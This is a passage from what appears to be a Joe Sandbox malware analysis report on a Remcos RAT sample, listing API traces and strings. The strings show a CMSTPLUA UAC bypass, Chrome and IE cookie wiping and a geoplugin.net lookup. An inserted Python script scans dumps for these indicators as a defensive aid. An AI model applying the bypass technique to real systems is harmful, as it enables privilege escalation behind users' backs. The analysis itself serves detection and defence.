                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 73f4216d9227424834ab683a62f21571e8b2afaadca920fe74bb7b8a40116277
                                                                                • Instruction ID: 24d0d0a4689f87ffb4dcaaffd559594d36fb5595b2754c282c0017beb782fcc1
                                                                                • Opcode Fuzzy Hash: 73f4216d9227424834ab683a62f21571e8b2afaadca920fe74bb7b8a40116277
                                                                                • Instruction Fuzzy Hash: 0D11A272618619FFCB202F75AC48E6B7B7DDB85720B10066EF816C6341EA39C90196B1
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                • int.LIBCPMT ref: 0040FC0F
                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                • String ID: P[G
                                                                                • API String ID: 2536120697-571123470
                                                                                • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0078FE63
                                                                                • int.LIBCPMT ref: 0078FE76
                                                                                  • Part of subcall function 0078D147: std::_Lockit::_Lockit.LIBCPMT ref: 0078D158
                                                                                  • Part of subcall function 0078D147: std::_Lockit::~_Lockit.LIBCPMT ref: 0078D172
                                                                                • std::_Facet_Register.LIBCPMT ref: 0078FEB2
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0078FED8
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0078FEF4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                • String ID: P[G
                                                                                • API String ID: 2536120697-571123470
                                                                                • Opcode ID: 66d1d2f93b0a437ba6194d5bb56da3cbca8cefc802f69fb3ca8fff7099274c15
                                                                                • Instruction ID: 13bbe1a86d28adbb8ee5aa8b6bee7f4a9d3af7eb7c45b2d80bec35bd48e6b403
                                                                                • Opcode Fuzzy Hash: 66d1d2f93b0a437ba6194d5bb56da3cbca8cefc802f69fb3ca8fff7099274c15
                                                                                • Instruction Fuzzy Hash: EA11B131E40518EBCB14F7A8D84AAEEB7689F40724B200069F90567192EB78AF45C7D5
                                                                                APIs
                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                Strings
                                                                                • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                • API String ID: 3121278467-91888290
                                                                                • Opcode ID: 117f478e5dcb85dc531d16fba4f4d200371f733cb8c6784368eadabc1d711714
                                                                                • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                • Opcode Fuzzy Hash: 117f478e5dcb85dc531d16fba4f4d200371f733cb8c6784368eadabc1d711714
                                                                                • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                APIs
                                                                                  • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                • _free.LIBCMT ref: 0044FD29
                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                • _free.LIBCMT ref: 0044FD34
                                                                                • _free.LIBCMT ref: 0044FD3F
                                                                                • _free.LIBCMT ref: 0044FD93
                                                                                • _free.LIBCMT ref: 0044FD9E
                                                                                • _free.LIBCMT ref: 0044FDA9
                                                                                • _free.LIBCMT ref: 0044FDB4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe), ref: 00406835
                                                                                  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                • CoUninitialize.OLE32 ref: 0040688E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                • String ID: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                • API String ID: 3851391207-2750610419
                                                                                • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                • int.LIBCPMT ref: 0040FEF2
                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                • String ID: H]G
                                                                                • API String ID: 2536120697-1717957184
                                                                                • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00790146
                                                                                • int.LIBCPMT ref: 00790159
                                                                                  • Part of subcall function 0078D147: std::_Lockit::_Lockit.LIBCPMT ref: 0078D158
                                                                                  • Part of subcall function 0078D147: std::_Lockit::~_Lockit.LIBCPMT ref: 0078D172
                                                                                • std::_Facet_Register.LIBCPMT ref: 00790195
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 007901BB
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 007901D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                • String ID: H]G
                                                                                • API String ID: 2536120697-1717957184
                                                                                • Opcode ID: 0a2989e8c640b6c3179e3035855110f6a7cb0f7e06d84751caa425ed32edbe19
                                                                                • Instruction ID: f29d4d888c387314ccfcf8fe4378fce4c8f16e827977d65fa4d4ad994d0d9e1c
                                                                                • Opcode Fuzzy Hash: 0a2989e8c640b6c3179e3035855110f6a7cb0f7e06d84751caa425ed32edbe19
                                                                                • Instruction Fuzzy Hash: F711AC32940518EFCF19FBA4E94A9EDB778AF50714B200059F8056B192EF38AF06CBD5
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 007869EF
                                                                                • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 00786A50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object_wcslen
                                                                                • String ID: $$[+] CoGetObject SUCCESS$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                • API String ID: 240030777-4254711192
                                                                                • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                • Instruction ID: 77ad8559ec3c00aff34e7cd2e82c538570b7d1ac6177e22a49efd5656300fa10
                                                                                • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                • Instruction Fuzzy Hash: CF117072A10118FBDB10FAA49859BDEB7BCDB44710F50406AF905E3241FB789E148779
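The function entries in this part of the report expose a handful of plaintext strings that are good triage indicators on their own: the CMSTPLUA CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7} passed to CoGetObject together with the UACMe debug message "[+] ucmCMLuaUtilShellExecMethod", the http://geoplugin.net/json.gp lookup, and the IE and Chrome cookie-wiping paths and status messages. The scanner below is an added example, not Joe Sandbox or Remcos code; it searches a dump region for those strings in both ASCII and UTF-16LE, because wide-string APIs such as CoGetObject receive UTF-16 arguments and an ASCII-only grep over the .sdmp misses them. The "Elevation:Administrator!new:" prefix is an assumption not shown on this page (it is the documented COM elevation moniker form the CMSTPLUA technique uses), and the sample dump is constructed inline rather than taken from the real process memory.

```python
"""Offline string triage of a memory-dump region for the Remcos behaviours above.

Added example; not Joe Sandbox or Remcos code. Searches for the strings the report
lists (CMSTPLUA CLSID, UACMe debug message, geoplugin URL, cookie-wiping paths) in
ASCII and UTF-16LE and groups the hits by the behaviour the report's signatures name.
"""
from collections import defaultdict

# Indicators copied from the function string listings in this section of the report.
INDICATORS = {
    "cmstplua_clsid": "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",
    "uacme_shellexec": "ucmCMLuaUtilShellExecMethod",
    "geoplugin_url": "http://geoplugin.net/json.gp",
    "chrome_cookies_path": "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies",
    "ie_user_shell_folders": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders",
    "ie_cookies_cleared": "[IE cookies cleared!]",
    "chrome_cookies_cleared": "[Chrome Cookies found, cleared!]",
    # Assumption: this prefix is not on the page; it is the documented COM elevation
    # moniker form ("Elevation:Administrator!new:{CLSID}") that CMSTPLUA abuse passes
    # to CoGetObject.
    "elevation_moniker": "Elevation:Administrator!new:",
}

# Indicator groups mapped to the behaviour the report's signatures describe.
BEHAVIOURS = {
    "uac_bypass_cmstplua": {"cmstplua_clsid", "uacme_shellexec", "elevation_moniker"},
    "geolocation_lookup": {"geoplugin_url"},
    "browser_cookie_wiping": {"chrome_cookies_path", "ie_user_shell_folders",
                              "ie_cookies_cleared", "chrome_cookies_cleared"},
}


def encodings(text):
    """Yield (label, needle) for the two encodings a Win32 binary may hold a string in."""
    yield "ascii", text.encode("ascii")
    yield "utf-16le", text.encode("utf-16-le")


def scan_dump(data):
    """Return [{indicator, encoding, offset}, ...] for every occurrence, ordered by offset."""
    hits = []
    for name, text in INDICATORS.items():
        for label, needle in encodings(text):
            start = 0
            while True:
                idx = data.find(needle, start)
                if idx == -1:
                    break
                hits.append({"indicator": name, "encoding": label, "offset": idx})
                start = idx + 1
    return sorted(hits, key=lambda h: h["offset"])


def classify(hits):
    """Return {behaviour: sorted indicator names} for behaviours with at least one hit."""
    seen = defaultdict(set)
    for h in hits:
        for behaviour, members in BEHAVIOURS.items():
            if h["indicator"] in members:
                seen[behaviour].add(h["indicator"])
    return {b: sorted(names) for b, names in seen.items()}


def build_sample_dump():
    """Constructed stand-in for an .sdmp region; not bytes from the real sample."""
    filler = bytes(range(256)) * 4  # 1024 bytes that contain none of the indicators
    moniker = ("Elevation:Administrator!new:"
               "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}").encode("utf-16-le") + b"\x00\x00"
    return (filler + moniker + filler
            + b"http://geoplugin.net/json.gp\x00" + filler
            + b"[+] ucmCMLuaUtilShellExecMethod\x00" + filler
            + b"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies\x00")


if __name__ == "__main__":
    found = scan_dump(build_sample_dump())
    for h in found:
        print(f"{h['offset']:#010x} {h['encoding']:<8} {h['indicator']}")
    print(classify(found))
```

To run it against the report's own artefacts, read the downloaded .sdmp for the 0x400000 or 0x780000 image with open(path, "rb").read() and pass it to scan_dump; a CLSID hit that only appears as UTF-16LE is the expected shape for the CoGetObject argument, while the "[+]" status messages are plain ASCII.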
                                                                                APIs
                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                Strings
                                                                                • UserProfile, xrefs: 0040B2B4
                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                • [Chrome Cookies not found], xrefs: 0040B308
                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteErrorFileLast
                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                • API String ID: 2018770650-304995407
                                                                                • Opcode ID: 80473ec72bc7b8e86fd4da3360fe18b30b4031f84b4b421f49e46732e938ea40
                                                                                • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                • Opcode Fuzzy Hash: 80473ec72bc7b8e86fd4da3360fe18b30b4031f84b4b421f49e46732e938ea40
                                                                                • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0079CBEF
                                                                                  • Part of subcall function 0079CC86: RegisterClassExA.USER32(00000030), ref: 0079CCD3
                                                                                  • Part of subcall function 0079CC86: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0079CCEE
                                                                                  • Part of subcall function 0079CC86: GetLastError.KERNEL32 ref: 0079CCF8
                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0079CC26
                                                                                • lstrcpyn.KERNEL32(00473B68,0046C104,00000080), ref: 0079CC40
                                                                                • Shell_NotifyIcon.SHELL32(00000000,00473B50), ref: 0079CC56
                                                                                • TranslateMessage.USER32(?), ref: 0079CC62
                                                                                • DispatchMessageA.USER32(?), ref: 0079CC6C
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0079CC79
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 1970332568-0
                                                                                • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                • Instruction ID: ac4db3dd68450ede6088bf0ec0d40e98c622e76b14db969cef199f4ac62f63ec
                                                                                • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                • Instruction Fuzzy Hash: 230121B1904344ABDB109FA5FC4DEDA7BBCA745B16F004035F609E2162D7B8A245EB68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$Rmc-GJDISH$BG
                                                                                • API String ID: 0-756390545
                                                                                • Opcode ID: 51f1828bc25dd4c0d61216237760cedcfa3e45f86a5da5526d20c461b23c031b
                                                                                • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                • Opcode Fuzzy Hash: 51f1828bc25dd4c0d61216237760cedcfa3e45f86a5da5526d20c461b23c031b
                                                                                • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$Rmc-GJDISH$BG
                                                                                • API String ID: 0-756390545
                                                                                • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                • Instruction ID: 3eb2435fa89bd804a639f8519ac93b4a36a39791380fc92f709bea40f0bddb3f
                                                                                • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                • Instruction Fuzzy Hash: 14F090F0BD1310EBDB203B346D1DB693A4AE78079BF104476F50AD72A2EB6C8C418798
                                                                                APIs
                                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 007929E6
                                                                                • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0078E832,pth_unenc,004742E0), ref: 00792A14
                                                                                • RegCloseKey.ADVAPI32(?,?,0078E832,pth_unenc,004742E0), ref: 00792A1F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: 2x$pth_unenc$BG
                                                                                • API String ID: 1818849710-2424854214
                                                                                • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                • Instruction ID: 802e40c40ee9988dbd138711a736116b7fac1555afbad4552105581c3c5d793e
                                                                                • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                • Instruction Fuzzy Hash: 5BF06D72580218BBDF10ABA0ED5AFEE376CEB00B81F108564F902A60A2E635DA05DB50
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00443305
                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                • _free.LIBCMT ref: 00443317
                                                                                • _free.LIBCMT ref: 0044332A
                                                                                • _free.LIBCMT ref: 0044333B
                                                                                • _free.LIBCMT ref: 0044334C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID: `=j
                                                                                • API String ID: 776569668-1880740554
                                                                                • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                APIs
                                                                                • __allrem.LIBCMT ref: 00439789
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                • __allrem.LIBCMT ref: 004397BC
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                • __allrem.LIBCMT ref: 004397F1
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 1992179935-0
                                                                                • Opcode ID: 90d3cbeaf7f932440d57ef5c22d3b8f6324572cbadffe2a0eaa56fc6fd551e6e
                                                                                • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                • Opcode Fuzzy Hash: 90d3cbeaf7f932440d57ef5c22d3b8f6324572cbadffe2a0eaa56fc6fd551e6e
                                                                                • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                APIs
                                                                                • __allrem.LIBCMT ref: 007B99F0
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B9A0C
                                                                                • __allrem.LIBCMT ref: 007B9A23
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B9A41
                                                                                • __allrem.LIBCMT ref: 007B9A58
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B9A76
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 1992179935-0
                                                                                • Opcode ID: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
                                                                                • Instruction ID: 0ea07ba95e09ee3eeaf98edb88d264ce091939b66d19080f24e4f35e1f7e1f19
